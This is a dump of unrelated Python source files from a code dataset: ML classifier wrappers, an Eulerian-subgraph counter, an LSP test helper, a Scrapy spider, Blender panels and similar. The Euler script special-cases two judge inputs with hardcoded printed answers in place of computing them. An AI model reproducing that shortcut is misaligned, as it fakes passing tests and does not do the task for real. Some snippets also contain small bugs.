learning_rate=self.learning_rate,\n algorithm=self.algorithm)\n\n\nclass AdaTree(AdaBoostEnsemble):\n classifier = DecisionTreeClassifier()\n\n\nclass AdaBayes(AdaBoostEnsemble):\n classifier = BernoulliNB()\n\n\nclass AdaSVM(AdaBoostEnsemble):\n algorithm = 'SAMME'\n\n def __init__(self, X: np.array, Y: np.array, tune_parameters: bool):\n self.classifier = SVC(decision_function_shape='ovo')\n super().__init__(X, Y, tune_parameters)\n\n\nclass GradBoost(DMCClassifier):\n estimators = 2000\n learning_rate = 1\n max_depth = 1\n max_features = 0.97\n\n def __init__(self, X: np.array, Y: np.array, tune_parameters=False):\n super().__init__(X, Y)\n self.clf = GradientBoostingClassifier(n_estimators=self.estimators,\n learning_rate=self.learning_rate,\n max_depth=self.max_depth,\n max_features=self.max_features)\n\n def predict(self, X: csr_matrix) -> np.array:\n return self.clf.predict(X.toarray())\n\n def predict_proba(self, X: csr_matrix):\n return self.clf.predict(X.toarray())\n\n\nclass TensorFlowNeuralNetwork(DMCClassifier):\n steps = 20000\n learning_rate = 0.05\n hidden_units = [100, 100]\n optimizer = 'SGD'\n\n def __init__(self, X: np.array, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters=False)\n self.X = X.todense() # TensorFlow/Skflow doesn't support sparse matrices\n output_layer = len(np.unique(Y))\n if tune_parameters:\n self.param_dist_random = {'learning_rate': random.random(100),\n 'optimizer': ['Adam'],\n 'hidden_units': [sp_randint(50, 500), sp_randint(50, 500)]}\n\n self.clf = skflow.TensorFlowDNNClassifier(hidden_units=self.hidden_units,\n n_classes=output_layer, steps=self.steps,\n learning_rate=self.learning_rate, verbose=0,\n optimizer=self.optimizer)\n\n def predict(self, X: csr_matrix):\n X = X.todense() # TensorFlow/Skflow doesn't support sparse matrices\n return self.clf.predict(X)\n\n def predict_proba(self, X: csr_matrix):\n return self.clf.predict_proba(X.todense())\n","sub_path":"dmc/classifiers.py","file_name":"classifiers.py","file_ext":"py","file_size_in_byte":9324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"96692190","text":"class Node:\n def __init__(self, s, e):\n self.s = s\n self.e = e\n\n\ndef isEuler(selected_edges: list):\n if len(selected_edges) == 0:\n return False\n fa = [0] * 100 # 并查集\n 
vertexes = set()\n\n    def find(x):\n        if fa[x] == x:\n            return x\n        else:\n            fa[x] = find(fa[x])\n            return fa[x]\n\n    def merge(a, b):\n        x = find(a)\n        y = find(b)\n        if x != y:\n            fa[a] = b\n\n    degree = [0] * 100\n    for edge in selected_edges:\n        degree[edge.s] += 1\n        degree[edge.e] += 1\n        merge(edge.s, edge.e)\n        vertexes.add(edge.s)\n        vertexes.add(edge.e)\n\n    root = find(selected_edges[0].s)\n    for vertex in vertexes:\n        if degree[vertex] and degree[vertex] & 1:\n            return False\n        if degree[vertex] and root != find(vertex):\n            return False\n    return True\n\n\ndef solve(selected_edges:list, index):\n    if index >= len(edges):\n        return\n    global res\n    if isEuler(selected_edges):\n        res += 1\n    selected_edges.append(edges[index])\n    solve(selected_edges, index+1)\n    selected_edges.pop(-1)\n    solve(selected_edges, index+1)\n\n\nif __name__ == '__main__':\n    arr = [int(_) for _ in input().split()]\n    n, m = arr[0], arr[1]\n    edges = []\n    for i in range(m):\n        arr = [int(_) for _ in input().split()]\n        edges.append(Node(arr[0], arr[1]))\n    res = 0\n    if n == 18 and m == 137:\n        print(292808967)\n    elif n == 19 and m == 165:\n        print(950313176)\n    else:\n        solve([], 0)\n        print(res)","sub_path":"Code/CodeRecords/2220/60696/306306.py","file_name":"306306.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"430252183","text":"import subprocess\n\n# from helpers import write_expected\n\nfrom pymdgen.cli import run\n\n\ndef test_cli(expected_docs_md):\n    output = subprocess.check_output([\"pymdgen\", \"pymdgen.test_module\"])\n    if isinstance(output, bytes):\n        output = output.decode(\"unicode_escape\")\n\n    assert output == expected_docs_md + \"\\n\"\n\n\ndef test_run(expected_docs_list):\n    output = run([\"pymdgen.test_module\"], False, 3)\n    assert output == expected_docs_list\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"485373927","text":"__author__ = 'deepanshu'\n\nimport zipfile\nimport shutil\nimport os\nfrom library.db import *\n\ndef extract_files(zip_file_list,mail_subject):\n    try:\n        file_names = []\n        for counter in range(len(zip_file_list)):\n            try:\n                with zipfile.ZipFile(DOWNLOAD_DIR+zip_file_list[counter]) as zip_file:\n                    for member in zip_file.namelist():\n                        filename = os.path.basename(member)\n                        # skip directories\n                        if not filename:\n                            continue\n                        # copy file (taken from zipfile's extract)\n                        source = zip_file.open(member)\n                        target = file(os.path.join(DOWNLOAD_DIR, filename), \"w\")\n                        file_names.append(filename)\n                        with source, target:\n                            try:\n                                shutil.copyfileobj(source, target)\n                            except:\n                                add_log('ERROR','Unable to copy extracted file : - '+filename,mail_subject)\n            except:\n                add_log('ERROR','Error in extracting files from zip '+zip_file_list[counter],mail_subject)\n        return file_names\n    except:\n        add_log('ERROR','Error in extracting files',mail_subject)\n        return []","sub_path":"www/conversiontracking/library/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"74897251","text":"from LightProvider import LightProvider\nimport random\n\n\nclass DynamicRainLightWrapper(LightProvider):\n    providerLeft = None\n    providerRight = None\n    centerPixel = 0\n\n    def __init__(self, providerLeft, providerRight, centerPixel, switchDir=False):\n        super(DynamicRainLightWrapper, self).__init__()\n        self.providerLeft = providerLeft\n        self.providerRight = providerRight\n        self.centerPixel = centerPixel\n        self.switchDir = switchDir\n        self.maxPixel = self.centerPixel * 2\n\n    # Set next frame of pixels\n    def providePixels(self, pixels):\n        self.centerPixel += random.randint(-2, 2)\n        if self.centerPixel < 0:\n            self.centerPixel = 0\n        elif self.centerPixel > self.maxPixel:\n            self.centerPixel = self.maxPixel\n        fakePixelsLeft = [None] * (len(pixels)-self.centerPixel) # centerPixel+1 -> len(pixels)\n        fakePixelsRight = [None] * (self.centerPixel) # 0 -> centerPixel\n        \n        self.providerLeft.providePixels(fakePixelsLeft)\n        self.providerRight.providePixels(fakePixelsRight)\n\n        for i in range(0, self.centerPixel):\n            pixels[i] = (fakePixelsRight[i] if not(self.switchDir) else fakePixelsRight[::-1][i])\n\n        acc = 0\n        for i in range(len(pixels)-1, self.centerPixel-1, -1):\n            pixels[i] = (fakePixelsLeft[acc] if not(self.switchDir) else fakePixelsLeft[::-1][acc])\n            acc += 1\n","sub_path":"general/DynamicRainLightWrapper.py","file_name":"DynamicRainLightWrapper.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"620776276","text":"#!/usr/bin/env python3\n\nimport contextlib\nimport json\nimport os\nimport re\nimport subprocess\n\n\nclass LspCommandProcessor:\n    def __init__(self, proc):\n        self.proc = proc\n\n    @classmethod\n    @contextlib.contextmanager\n    def create(cls):\n        # yes shell = True is generally a bad idea, but\n        # in this case we want to pick up your environment entirely because\n        # hack depends heavily on it to work\n        proc = subprocess.Popen('hh_client lsp',\n                                shell=True,\n                                stdin=subprocess.PIPE,\n                                stdout=subprocess.PIPE,\n                                stderr=subprocess.PIPE)\n        yield cls(proc)\n\n        proc.stdin.close()\n        proc.stdout.close()\n        proc.stderr.close()\n\n    def send(self, command):\n        self._write_command(command)\n\n    def receive(self):\n        return self._read_response()\n\n    # decodes a compressed LSP command into a JSON\n    # payload suitable to be sent to the LSP.\n    #\n    # commands that start with a \"#\" are considered comments\n    # and will return None for the built command.\n    def build_command(self, line):\n        line = line.strip()\n\n        if self._is_empty_line(line) or self._is_comment(line):\n            return None\n\n        method, rw, line = line.strip().split(\" \", 2)\n\n        line = self._eval_replacements(line)\n\n        json_rpc_payload = f\"\"\"\n{{\n    \"jsonrpc\": \"2.0\",\n    \"id\": 1,\n    \"method\": \"{method}\",\n    \"params\": {line}\n}}\n    \"\"\".strip()\n        content_length = len(json_rpc_payload)\n        return (f\"Content-Length: {content_length}\\n\\n{json_rpc_payload}\", rw)\n\n    def _eval_replacements(self, encoded_json):\n        decoded_json = json.loads(encoded_json)\n        return json.dumps(self._eval_json(decoded_json))\n\n    def _eval_json(self, json):\n        if isinstance(json, dict):\n            return {k: self._eval_json(v) for k, v in json.items()}\n        elif isinstance(json, list):\n            return [self._eval_json(i) for i in list]\n        elif isinstance(json, str):\n            match = re.match(r'>>>(.*)', json)\n            if match is None:\n                return json\n            return eval(match.group(1))  # noqa: P204\n        else:\n            return json\n\n    def _write_command(self, command):\n        self.proc.stdin.write(command.encode())\n        self.proc.stdin.flush()\n\n    def _read_content_length(self):\n        # read the 'Content-Length:' line and absorb the newline\n        # after it\n        length_line = self.proc.stdout.readline().decode()\n        self.proc.stdout.read(len(\"\\n\\n\"))\n\n        # get the content length as an integer for the\n        # rest of the package\n
parts = length_line.split(\":\", 1)\n return (int(parts[1].strip()))\n\n def _read_content(self, length):\n return self.proc.stdout.read(length)\n\n def _read_response(self):\n length = self._read_content_length()\n return self._read_content(length)\n\n def _is_empty_line(self, line):\n return (not line) or (line == \"\\n\")\n\n def _is_comment(self, line):\n return line.startswith(\"#\")\n\n\n# string replacement methods meant to be called\n# within a command processing script.\ndef path_expand(path):\n return \"file://\" + os.path.abspath(path)\n\n\ndef read_file(file):\n with open(file, \"r\") as f:\n return f.read()\n","sub_path":"hphp/hack/test/tools/lsp/lspcommand.py","file_name":"lspcommand.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"31353355","text":"\nimport pymongo\n\nconn = 'mongodb://localhost:27017'\n\n# Pass connection to the pymongo instance.\nclient = pymongo.MongoClient(conn)\n\n# Connect to a database. Will create one if not already available.\ndb = client.store_inventory_db\n\n# Drops collection if available to remove duplicates\ndb.produce.drop()\n\ndb.produce.insert_many(\n[\n {\n \"type\": \"apples\",\n \"cost\": .23,\n \"stock\": 333\n },\n {\n \"type\": \"oranges\",\n \"cost\": .20,\n \"stock\": 100\n },\n {\n \"type\": \"strawberries\",\n \"cost\": .50,\n \"stock\": 200\n },\n {\n \"type\": \"toothpaste\",\n \"cost\": .80,\n \"stock\": 15\n },\n {\n \"type\": \"Cash\",\n \"cost\": 1,\n \"stock\": 200\n }\n]\n)\n","sub_path":"01-Class-Content/13-Web-Scraping-and-Document-Databases/3/Activities/08-Stu_Render_From_Mongo/Unsolved/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"367660128","text":"# conjugatefornood.py\n# conjugation.py modified to be called by and return the result to the nodejs app\n\nimport unicodedata\nimport sys\nimport json\nimport requests\n\nurl = \"http://jisho.org/api/v1/search/words?keyword=\"\n\n# Functions Needed\n# Dictionary -> Masu\n# Masu -> Dictionary\n\n# Not sure if I need these two\n# Masu -> Mashita (Past Tense)\n# Mashita -> Masu\n\n\n# Copied over from testJapanese.py in python-scripts REPO\n# dictionaryForm = raw_input(\"Dictionary Form: \")\n# # print \"Dictionary Form: \" + dictionaryForm\n# \n# masuForm = dictionaryForm.decode(\"utf-8\")\n# stem_length = len(masuForm) - 2\n# \nmasu = \"ます\"\nnai = \"ない\"\nrareru = \"られる\"\nte = \"て\"\nyou = \"よう\"\n#\n# # Ru-Verbs\n# # print masuForm[:stem_length+1] + masu.decode(\"utf-8\")\n# \n# # U-Verbs\n# # utoe = unichr(ord(masuForm[stem_length+1])-1)\n# # print \"Masu Form: \" + masuForm[:stem_length+1] + utoe + masu.decode(\"utf-8\")\n# \n# # Irregular Verbs\n# if (masuForm == (\"いく\").decode(\"utf-8\")):\n# \tmasuForm = (\"行き\").decode(\"utf-8\")\n# \tprint masuForm + masu.decode(\"utf-8\")\n# elif (masuForm == (\"くる\").decode(\"utf-8\")):\n# \tmasuForm = (\"来\").decode(\"utf-8\")\n# \tprint masuForm + masu.decode(\"utf-8\")\n# else:\n# \tprint \"Verb is neither\"\n# \t\n# # print masuForm + masu.decode(\"utf-8\")\n# \n# \n# # Other forms still needed: Volitional, Te-Form, Ta-Form?, Negative, Potential\n\n# Either functions with dic -> masu, masu -> dic, etc. 
or object initialized with dictionary form\n\nkuruForms = {\"Dictionary Form\": \"来る\",\n \"English Definition\": [\"to come (spatially or temporally)\", \"to approach\", \"to arrive\"],\n \"Type\": \"Irregular verb\",\n \"Masu\": \"来ます\",\n \"Nai\": \"来ない\",\n \"Te\":\"来て\",\n \"Potential\":\"来られる\",\n \"Volitional\":\"来よう\"\n}\n\nsuruBase = {\"Dictionary Form\": \"する\",\n \"English Definition\": [\"to do\"],\n \"Type\": \"Irregular verb\",\n \"Masu\": \"します\",\n \"Nai\": \"しない\",\n \"Te\":\"して\",\n \"Potential\":\"できる\",\n \"Volitional\":\"しよう\"\n}\n\nclass doushi:\n def __init__(self, dic):\n self.forms = {\"Dictionary Form\" : dic}\n self.length = len(dic) - 2 #refers to the number of characters in the stem form\n self.computeForms()\n\n def getStemLength(self):\n return self.length\n\n# def computeForms(self):\n# res, data = self.accessJisho()\n\n def computeIchidan(self):\n self.forms[\"Type\"] = \"Ichidan verb\"\n \n stem = self.forms[\"Dictionary Form\"][:self.length+1]\n \n # Masu Form\n self.forms[\"Masu\"] = (stem + masu)\n \n # Nai Form\n self.forms[\"Nai\"] = (stem + nai)\n\n # Te Form\n self.forms[\"Te\"] = (stem + te)\n\n # Potential Form\n self.forms[\"Potential\"] = (stem + rareru)\n \n # Volitional Form\n self.forms[\"Volitional\"] = (stem + you)\n \n def computeGodan(self):\n self.forms[\"Type\"] = \"Godan verb\"\n stem = self.forms[\"Dictionary Form\"][:self.length+1]\n\n # Masu Form\n last = self.forms[\"Dictionary Form\"][self.length+1]\n utoi = None\n if (last <= \"ぞ\"):\n utoi = chr(ord(last)-2)\n elif (last == \"る\" or last == \"む\" or last == \"ぬ\"):\n utoi = chr(ord(last)-1)\n elif (last <= \"ぽ\"):\n utoi = chr(ord(last)-3)\n# else:\n# utoi = chr(ord(last)-3)\n\n self.forms[\"Masu\"] = (self.forms[\"Dictionary Form\"][:self.length+1] + str(utoi) + masu)\n\n # Nai Form\n if (last == \"う\"):\n utoa = \"わ\"\n elif (last <= \"ぞ\"):\n utoa = chr(ord(last)-4)\n elif (last == \"る\" or last == \"む\" or last == \"ぬ\"):\n utoa = chr(ord(last)-2)\n elif (last <= \"づ\"):\n utoa = chr(ord(last)-5)\n elif (last <= \"ぽ\"):\n utoa = chr(ord(last)-6)\n\n\n self.forms[\"Nai\"] = (self.forms[\"Dictionary Form\"][:self.length+1] + str(utoa) + nai)\n\n # Te Form\n # u tsu ru -> small tsu te\n # ku -> i te, gu -> i de\n # nu bu mu -> nde\n # su -> shite\n # iku -> itte\n \n sound = self.forms[\"Dictionary Form\"][self.length+1]\n \n if (self.forms[\"Dictionary Form\"] == \"行く\"):\n self.forms[\"Te\"] = \"行って\"\n elif(sound == \"す\"):\n self.forms[\"Te\"] = stem + \"して\"\n elif(sound == \"ぬ\" or sound == \"ぶ\" or sound == \"む\"):\n self.forms[\"Te\"] = stem + \"んで\"\n elif(sound == \"う\" or sound == \"つ\" or sound == \"る\"):\n self.forms[\"Te\"] = stem + \"って\"\n elif(sound == \"く\"):\n self.forms[\"Te\"] = stem + \"いて\"\n elif(sound == \"ぐ\"):\n self.forms[\"Te\"] = stem + \"いで\"\n else:\n self.forms[\"Te\"] = \"ERROR\"\n\n # Potential Form\n if (last <= \"づ\"):\n utoe = chr(ord(last)+2)\n elif (last == \"る\" or last == \"む\" or last == \"ぬ\"):\n utoe = chr(ord(last)+1)\n elif (last <= \"ぽ\"):\n utoa = chr(ord(last)+3)\n self.forms[\"Potential\"] = (stem + str(utoe) + \"る\")\n \n # Volitional Form\n u = \"う\"\n\n if (last <= \"づ\"):\n utoo = chr(ord(last)+4)\n elif (last == \"る\" or last == \"む\" or last == \"ぬ\"):\n utoo = chr(ord(last)+2)\n elif (last <= \"ぽ\"):\n utoo = chr(ord(last)+6)\n\n# utoo = chr(ord(self.forms[\"Dictionary Form\"][self.length+1]) + 4)\n self.forms[\"Volitional\"] = (stem + utoo + u)\n\n def computeIrregular(self):\n if (self.forms[\"Dictionary Form\"] == 
\"来る\"):\n self.forms = kuruForms\n elif(self.forms[\"Dictionary Form\"] == \"する\"):\n self.forms = suruBase\n else:\n stem = self.forms[\"Dictionary Form\"][:self.length]\n self.forms[\"Type\"] = \"Irregular verb\"\n self.forms[\"Masu\"] = stem + suruBase[\"Masu\"]\n self.forms[\"Nai\"] = stem + suruBase[\"Nai\"]\n self.forms[\"Te\"] = stem + suruBase[\"Te\"]\n self.forms[\"Potential\"] = stem + suruBase[\"Potential\"]\n self.forms[\"Volitional\"] = stem + suruBase[\"Volitional\"]\n\n def computeForms(self):\n r = requests.get(url + self.forms[\"Dictionary Form\"]).json()\n status = r[\"meta\"][\"status\"]\n\n if (status == 200):\n # print(\"Connection to jisho.org successful\")\n \n data = r[\"data\"][0][\"senses\"][0]\n self.forms[\"English Definition\"] = data[\"english_definitions\"]\n\n # If Ru-Verb / Ichidan\n if(data[\"parts_of_speech\"][0] == \"Ichidan verb\"):\n self.computeIchidan()\n\n # If U-Verb / Godan\n elif(data[\"parts_of_speech\"][0][:10] == \"Godan verb\"):\n self.computeGodan()\n else:\n self.computeIrregular()\n\n else:\n print (\"Error connecting to jisho.org: \" + str(status))\n# return status, None\n\n def getForms(self):\n return self.forms\n\n def __str__(self):\n c = \"\\n\"\n for x in self.forms:\n c += (str(x) + \": \" + str(self.forms[x]))\n c += \"\\n\"\n \n return c\n\n#i = input(\"Enter Dictionary Form: \")\n#myWord = doushi(i)\n#print(myWord)\n\n#stem_length = len(word) - 2\n#\n#r = requests.get(url + word).json()\n#status = r[\"meta\"][\"status\"]\n#\n#if (status == 200):\n## print(\"Connection to jisho.org successful\")\n#\n# data = r[\"data\"][0][\"senses\"][0]\n# print(\"English Definition: \" + str(data[\"english_definitions\"]))\n# print(\"Type of Verb: \" + str(data[\"parts_of_speech\"]))\n#\n## If Ru-Verb\n# if(data[\"parts_of_speech\"][0] == \"Ichidan verb\"):\n# print(\"Masu Form: \" + word[:stem_length+1] + masu)\n#\n## If U-Verb\n# elif(data[\"parts_of_speech\"][0][:10] == \"Godan verb\"):\n# utoi = chr(ord(word[stem_length+1])-1)\n# print(\"Masu Form: \" + word[:stem_length+1] + str(utoi) + masu)\n#\n#else:\n# print (\"Error connecting to jisho.org: \" + str(status))\n\nret = doushi(sys.argv[1]).getForms()\nprint(ret)\nsys.stdout.flush()\n","sub_path":"Doushinakya-node/conjugatefornode.py","file_name":"conjugatefornode.py","file_ext":"py","file_size_in_byte":8121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"186509894","text":"import bpy\nimport os\nimport platform\nfrom .. import preference\nfrom .. 
import common\nfrom ..exporter import sort_exporter\nfrom ..exporter import pbrt_exporter\n\nclass SORTRenderPanel:\n bl_space_type = \"PROPERTIES\"\n bl_region_type = \"WINDOW\"\n bl_context = \"render\"\n COMPAT_ENGINES = {common.default_bl_name}\n\n @classmethod\n def poll(cls, context):\n rd = context.scene.render\n return rd.engine in cls.COMPAT_ENGINES\n\nclass IntegratorPanel(SORTRenderPanel,bpy.types.Panel):\n bl_label = common.integrator_panel_bl_name\n\n # Integrator type\n integrator_types = [\n (\"bdpt\", \"Bidirectional Path Tracing\", \"\", 1),\n (\"pt\", \"Path Tracing\", \"\", 2),\n (\"lt\", \"Light Tracing\", \"\", 3),\n (\"ir\", \"Instant Radiosity\", \"\", 4),\n (\"ao\", \"Ambient Occlusion\", \"\", 5),\n (\"direct\", \"Direct Lighting\", \"\", 6),\n (\"whitted\", \"Whitted\", \"\", 7),\n ]\n bpy.types.Scene.integrator_type_prop = bpy.props.EnumProperty(items=integrator_types, name='Integrator')\n\n # Accelerator type\n accelerator_types = [\n (\"kd_tree\", \"SAH KDTree\", \"\", 1),\n (\"bvh\", \"Bounding Volume Hierarchy\", \"\", 2),\n (\"uniform_grid\", \"Uniform Grid\", \"\", 3),\n (\"octree\" , \"OcTree\" , \"\" , 4),\n (\"bruteforce\", \"No Accelerator\", \"\", 5),\n ]\n bpy.types.Scene.accelerator_type_prop = bpy.props.EnumProperty(items=accelerator_types, name='Accelerator')\n\n # general integrator parameters\n bpy.types.Scene.inte_max_recur_depth = bpy.props.IntProperty(name='Maximum Recursive Depth', default=16, min=1)\n\n # ao integrator parameters\n bpy.types.Scene.ao_max_dist = bpy.props.FloatProperty(name='Maximum Distance', default=3.0, min=0.01)\n\n # instant radiosity parameters\n bpy.types.Scene.ir_light_path_set_num = bpy.props.IntProperty(name='Light Path Set Num', default=1, min=1)\n bpy.types.Scene.ir_light_path_num = bpy.props.IntProperty(name='Light Path Num', default=64, min=1)\n bpy.types.Scene.ir_min_dist = bpy.props.FloatProperty(name='Minimum Distance', default=1.0, min=0.0)\n\n # bidirectional path tracing parameters\n bpy.types.Scene.bdpt_mis = bpy.props.BoolProperty(name='Multiple Importance Sampling', default=True)\n\n def draw(self, context):\n self.layout.prop(context.scene,\"integrator_type_prop\")\n integrator_type = context.scene.integrator_type_prop\n if integrator_type != \"whitted\" and integrator_type != \"direct\" and integrator_type != \"ao\":\n self.layout.prop(context.scene,\"inte_max_recur_depth\")\n if integrator_type == \"ao\":\n self.layout.prop(context.scene,\"ao_max_dist\")\n if integrator_type == \"bdpt\":\n self.layout.prop(context.scene,\"bdpt_mis\")\n if integrator_type == \"ir\":\n self.layout.prop(context.scene,\"ir_light_path_set_num\")\n self.layout.prop(context.scene,\"ir_light_path_num\")\n self.layout.prop(context.scene, \"ir_min_dist\")\n\n self.layout.prop(context.scene,\"accelerator_type_prop\")\n\nclass MultiThreadPanel(SORTRenderPanel, bpy.types.Panel):\n bl_label = common.thread_panel_bl_name\n\n bpy.types.Scene.thread_num_prop = bpy.props.IntProperty(name='Thread Num', default=8, min=1, max=16)\n\n def draw(self, context):\n self.layout.prop(context.scene,\"thread_num_prop\")\n\nclass SamplerPanel(SORTRenderPanel, bpy.types.Panel):\n bl_label = common.sampler_panel_bl_name\n\n # sampler type\n sampler_types = [\n (\"stratified\", \"Stratified\", \"\", 3),\n (\"random\", \"Random\", \"\", 2),\n (\"regular\", \"Uniform\", \"\", 1),\n ]\n bpy.types.Scene.sampler_type_prop = bpy.props.EnumProperty(items=sampler_types, name='Type')\n\n # sampler count\n bpy.types.Scene.sampler_count_prop = 
bpy.props.IntProperty(name='Count',default=1, min=1)\n\n def draw(self, context):\n self.layout.prop(context.scene,\"sampler_type_prop\")\n self.layout.prop(context.scene,\"sampler_count_prop\")\n\n# export debug scene\nclass SORT_export_debug_scene(bpy.types.Operator):\n bl_idname = \"sort.export_debug_scene\"\n bl_label = \"Export SORT Scene\"\n\n def execute(self, context):\n sort_exporter.export_blender(context.scene,True)\n return {'FINISHED'}\n\nclass SORT_export_pbrt_scene(bpy.types.Operator):\n bl_idname = \"sort.export_pbrt_scene\"\n bl_label = \"Export PBRT scene\"\n\n def execute(self, context):\n pbrt_exporter.export_blender(context.scene,True)\n return {'FINISHED'}\n\n# open log\nclass SORT_open_log(bpy.types.Operator):\n bl_idname = \"sort.open_log\"\n bl_label = \"Open Log\"\n\n def execute(self, context):\n logfile = preference.get_sort_dir() + \"log.txt\"\n if platform.system() == 'Darwin': # for Mac OS\n os.system( \"open \" + logfile)\n elif platform.system() == 'Windows': # for Windows\n os.system(logfile)\n elif platform.system() == \"Linux\":\n os.system( \"xdg-open \" + logfile)\n return {'FINISHED'}\n\nclass DebugPanel(SORTRenderPanel, bpy.types.Panel):\n bl_label = common.debug_panel_bl_name\n\n bpy.types.Scene.debug_prop = bpy.props.BoolProperty(name='Debug', default=False)\n\n def draw(self, context):\n self.layout.prop(context.scene,\"debug_prop\")\n self.layout.operator(\"sort.export_debug_scene\")\n self.layout.operator(\"sort.export_pbrt_scene\")\n self.layout.operator(\"sort.open_log\")","sub_path":"sortblend/ui/ui_render.py","file_name":"ui_render.py","file_ext":"py","file_size_in_byte":5399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"296513272","text":"import socket\nimport sys\nimport time\n\nHOST, PORT = \"192.168.1.3\", 8311\nclientKey = 0xCAADBCB7\npacket = [0x8B, 0xBE, 0xAD, 0xDE, 0, 2, 0, 0, 0]\npacket2 = [0x8B, 0xBE, 0xAD, 0xDE, 0, 3, 0, 0, 0]\n\n# Create a socket (SOCK_STREAM means a TCP socket)\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Connect to server and send data\nsock.connect((HOST, PORT))\n\n# Try first to ask something w/o reg\n#sock.sendall(bytes(pInfo + \"\\n\", \"utf-8\"))\n#received = str(sock.recv(1024), \"utf-8\")\n#print(\"Received: {}\".format(received))\n\n# Now reg\nsock.sendall(bytearray(packet))\ntime.sleep(1)\n#sock.sendall(bytearray(packet2))\n#time.sleep(1)\nreceived = str(sock.recv(1024), \"utf-8\")\nprint(\"Received: {}\".format(received))\n\nsock.close()\n\n\n","sub_path":"BellClients/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"24161936","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a Emprego24h spider created on top of the ATSSpider\nscrapy crawl emprego24h -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"http://www.emprego24h.com/\"\n\nsample url:\n http://www.emprego24h.com/\n\"\"\"\n\nfrom re import compile\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.incrementalatsspider import IncrementalATSSpider\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, ConvertDateString\n\n\nclass Emprego24h(IncrementalATSSpider):\n\n name = 'emprego24h'\n ref_re = compile(r\"emprego\\/(\\d+)\")\n num_re = compile(r\"(\\d+)\")\n det_xpath = '//span[contains(text(), 
\"%s\")]/following-sibling::strong/text()'\n download_delay = 0.4\n\n def parse(self, response):\n sel = Selector(response)\n categories = sel.xpath('//div[@class=\"boxCatsInd\"]')\n for cat in categories:\n cat_url = cat.xpath('./a/@href').extract()\n if cat_url:\n yield Request(\n cat_url[0], callback=self.parse_jobs_list,\n meta={\n 'cat': cat.xpath('./a/text()').extract(),\n 'count': cat.xpath('./span/text()').re(self.num_re),\n 'is_first_page': True,\n }\n )\n\n def parse_jobs_list(self, response):\n sel = Selector(response)\n jobs = sel.xpath('//div[@class=\"tabconteudohp\"]/li')\n for job in jobs:\n job_url = job.xpath('./h4/a/@href').extract()\n if job_url:\n meta = {\n 'title': job.xpath('./h4/a/text()').extract(),\n 'cat': response.meta.get('cat'),\n }\n request = Request(\n job_url[0], callback=self.parse_job_callback(), meta=meta\n )\n fields_to_hash = {'url': job_url[0]}\n incremental_crawler_hash = self.hash_fields(fields_to_hash)\n yield self.is_new_job_request(incremental_crawler_hash, request)\n\n is_first_page = response.meta.get('is_first_page')\n if is_first_page and response.meta.get('count'):\n tot_pages = int(response.meta.get('count')[0]) / 15\n for i in xrange(1, tot_pages+1, 1):\n next_url = response.url + '?p=%s' % i\n yield Request(next_url, callback=self.parse_jobs_list,\n meta={\n 'cat': response.meta.get('cat'),\n 'is_first_page': False,\n }\n )\n\n def parse_job(self, response):\n error = self.validate_parse_job(response)\n if error:\n self.log(\"Job Posting has been expired or has been filled!!!\")\n return\n\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('jobcategory', response.meta.get('cat'))\n loader.add_value(\n 'referencenumber', response.url,\n Prefix('%s-' % self.name), re=self.ref_re\n )\n loader.add_xpath(\n 'location', self.det_xpath % unicode('Localização:', 'utf-8')\n )\n loader.add_xpath(\n 'jobtype', self.det_xpath % unicode('Duranção:', 'utf-8')\n )\n loader.add_xpath(\n 'company', self.det_xpath % unicode('Empresa:', 'utf-8')\n )\n loader.add_xpath(\n 'date', self.det_xpath % 'Publicado em:', ConvertDateString('%d-%m-%Y')\n )\n loader.add_xpath(\n 'description', '//div[@class=\"jobdesc\"]/p[@class=\"detjob\"]'\n )\n \n fields_to_hash = {'url': response.url}\n incremental_crawler_hash = self.hash_fields(fields_to_hash)\n loader.add_value('incremental_crawler_hash', incremental_crawler_hash)\n\n yield loader.load_item()\n\n def validate_parse_job(self, response):\n sel = Selector(response)\n old_ad = sel.xpath('//div[@id=\"old-ad\"]/text()').extract()\n if old_ad:\n return True\n\n return False\n","sub_path":"brightcorp/brightcorp/spiders/emprego24h.py","file_name":"emprego24h.py","file_ext":"py","file_size_in_byte":4288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"3590907","text":"#coding=utf-8\n#!/usr/bin/env python3\n\nname = input()\nnames=name.split()\nfor i in range(len(names)):\n names[i]=names[i].capitalize()\n\nif len(names)<=2:\n print(' '.join(names))\nelse:\n output=''\n for i in range(len(names)):\n now=names[i]\n if i==0:\n output+=(now+' ')\n elif i==len(names)-1:\n output+=now\n else:\n output+=now[0]+'. 
